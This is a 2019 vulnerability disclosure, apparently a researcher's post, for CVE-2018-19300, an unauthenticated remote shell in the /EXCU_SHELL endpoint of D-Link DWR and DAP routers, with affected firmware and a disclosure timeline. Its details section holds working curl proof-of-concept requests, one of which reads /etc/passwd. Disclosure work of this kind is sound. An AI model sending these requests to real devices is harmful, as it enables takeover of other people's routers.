CVE-2018-19300: Remote Command Execution Vulnerability in D-Link DWR and DAP Routers

_jp · March 17, 2019, 7:38am

(Administrator note- this is has been updated in March 2023 to remove outdated links)

Overview

In early November, 2018, while analyzing D-Link DWR devices, we discovered a vulnerability in DWR-711 and DAP-1530 Routers. This vulnerability would allow an unauthenticated attacker to perform shell commands with full administrative privileges on the vulnerable device.

Vulnerability Details

Affected are according to D-Link following devices and firmware versions:
- DAP-1530 (All A revisions) before firmware version 1.06b01
- DAP-1610 (All A revisions) before firmware version 1.06b01
- DWR-111 (All A revisions) before firmware version 1.02v02
- DWR-116 (All A revisions) before firmware version 1.06b03
- DWR-512 (All B revisions) before firmware version 2.02b01
- DWR-711 (All A revisions) through firmware version 1.11
- DWR-712 (All B revisions) before firmware version 2.04b01
- DWR-921 (All A revisions) before firmware version 1.02b01
- DWR-921 (All B revisions) before firmware version 2.03b01
The vulnerability exists within the /EXCU_SHELL URI, to exploit it an attacker would have to send a GET request to it with the following headers
- cmdnum: 1 (This specifies the number of commands to execute, but 1 is sufficient for this)
- command1: [command] (This is the command to be executed)
- confirm1: n (This specifies that the command should be executed without prior confirmation)
A curl command would look like this:
- curl '[IP]/EXCU_SHELL' -H 'cmdnum: 1' -H 'command1: ls -l /' -H 'confirm1: n'
The shell supports all basic bash commands and more, and delivers the output in a HTTP response. The /EXCU_SHELL redirects all input straight to the /bin/bash shell.
Example:
- curl 'http://[IP]:[Port]/EXCU_SHELL' -H 'cmdnum: 1' -H 'command1: cat /etc/passwd' -H 'confirm1: n' --compressed
  admin:[Password]:0:0:Adminstrator:/:/bin/sh

The vulnerability seems to be by design, as the /EXCU_SHELL is used for tasks such as retrieving hardware and firmware version information. An active check for this vulnerability can be found in the Greenbone Security Feed, using the OID 1.3.6.1.4.1.25623.1.0.113294.

Mitigation

The vendor has started to release firmware updates for all affected devices. Please see the vendor advisory linked in the references for more information.

References

Disclosure Timeline

2018/11/13: Informed D-Link USA Incident Response Team about the vulnerability. (Further informed D-Link IR Team that the vulnerability will be disclosed if no advisory or fix is released within 90 days)
2018/11/14: Response from D-Link IR Team, asking for specifics about model number and firmware version
2018/11/14: Provided D-Link IR Team with the requested information
2018/11/14: Answer from D-Link IR Team, detailing their plan to go about the disclosure, asking the 3rd party (us) to request a CVE ID
2018/11/15: Requested a CVE ID
2018/11/15: Got assigned CVE-2018-19300
2018/11/16: Informed D-Link IR Team about the CVE ID and asked for a status update within 90 days or once a fix has been developed
2018/11/21: Mail from D-Link Germany, asking for more details and a PoC
2018/11/21: Answered with further details and a PoC in the form of a specific curl request
2019/02/11: End of 90-day deadline
2019/02/19: Contacted D-Link Germany to ask about their progress and to inform about the deadline having been exceeded by a week
2019/02/19: Answer from D-Link Germany that they will inform us as soon as possible
2019/02/26: Informed D-Link that a disclosure is planned for the upcoming week
2019/03/01: Answer from D-Link with information about affected models and fixed firmware versions
2019/03/17: Disclosure of the vulnerability in accordance to our Responsible Disclosure guidelines as no fix or notification of the vendor was provided to the end user and the deadline was already exceeded by one 36 days